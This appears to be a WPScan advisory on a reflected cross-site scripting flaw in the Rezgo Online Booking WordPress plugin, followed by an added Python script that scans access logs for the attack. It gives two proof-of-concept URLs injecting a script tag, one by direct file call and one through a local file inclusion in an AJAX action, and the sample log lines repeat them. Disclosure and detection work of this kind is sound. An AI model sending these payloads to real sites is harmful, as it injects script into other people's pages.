wpvulndb | Cydave | WPVDB-ID:005C2300-F6BD-416E-97A6-D42284BBB093
History: Jul 26, 2022 - 12:00 a.m.

Rezgo Online Booking < 4.1.8 - Reflected Cross-Site-Scripting

2022-07-26 00:00:00
cydave
wpscan.com
5
rezgo online booking
reflected cross-site-scripting
plugin vulnerability
sanitisation
ajax action
direct call

EPSS

0.001

Percentile

40.2%

The plugin does not sanitise and escape some parameters before outputting them back in a page, leading to a Reflected Cross-Site Scripting issue, which can be exploited either via an LFI in an AJAX action or by a direct call to the affected file.

PoC

Direct call:
https://example.com/wp-content/plugins/rezgo/rezgo/templates/default/frame_header.php?tags="><script>alert(`xss`)</script>

Via the LFI: Once the plugin is configured (can use a dummy “Rezgo Company Code” and “Rezgo API Key” in the “Account Information” settings section):
http://example.com/wp-admin/admin-ajax.php?action=rezgo&method=rezgo/templates/default/frame_header&tags="><script>alert(`xss`)</script>
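
A log check for the two request shapes in the PoC, as an added example that is not part of the original advisory or of the plugin's code: it flags access-log requests that reach frame_header.php directly or through admin-ajax.php while carrying markup characters in `tags`. The sample log lines, the `method=calendar` value and the `templates/` heuristic are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Template file named in the advisory; it is meant to be included, not requested.
TEMPLATE = "/wp-content/plugins/rezgo/rezgo/templates/default/frame_header.php"
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Characters that let a reflected value break out of an attribute or tag.
MARKUP = re.compile(r"[<>\"'`]")

def classify(log_line):
    """Return 'direct', 'ajax-include' or None for one access-log line."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
    if not any(MARKUP.search(v) for v in params.get("tags", [])):
        return None
    if url.path.endswith(TEMPLATE):
        return "direct"
    # Heuristic (assumption): a `method` value pointing into templates/
    # is the include route described in the advisory.
    if (url.path.endswith("/wp-admin/admin-ajax.php")
            and "rezgo" in params.get("action", [])
            and any("templates/" in v for v in params.get("method", []))):
        return "ajax-include"
    return None

def scan(lines):
    """Return (line_number, verdict) for every flagged line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        verdict = classify(line)
        if verdict:
            hits.append((number, verdict))
    return hits

# Constructed sample log lines (combined log format, documentation IP ranges).
SAMPLE_LOG = [
    '203.0.113.7 - - [26/Jul/2022:10:00:01 +0000] "GET /wp-content/plugins/rezgo/rezgo/templates/default/frame_header.php?tags=%22%3E%3Cscript%3Ealert(%60xss%60)%3C/script%3E HTTP/1.1" 200 512',
    '203.0.113.7 - - [26/Jul/2022:10:00:05 +0000] "GET /wp-admin/admin-ajax.php?action=rezgo&method=rezgo/templates/default/frame_header&tags=%22%3E%3Cscript%3Ealert(%60xss%60)%3C/script%3E HTTP/1.1" 200 498',
    '198.51.100.4 - - [26/Jul/2022:10:01:12 +0000] "GET /wp-admin/admin-ajax.php?action=rezgo&method=calendar&tags=family HTTP/1.1" 200 2210',
    '198.51.100.4 - - [26/Jul/2022:10:01:30 +0000] "GET /tours/?tags=kayak HTTP/1.1" 200 9001',
]

if __name__ == "__main__":
    for number, verdict in scan(SAMPLE_LOG):
        print(f"line {number}: {verdict}")
```

Hits on sites still running a version below 4.1.8 are the ones to triage first; the check only reads the query string, so POST bodies need a separate source such as WAF logs.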
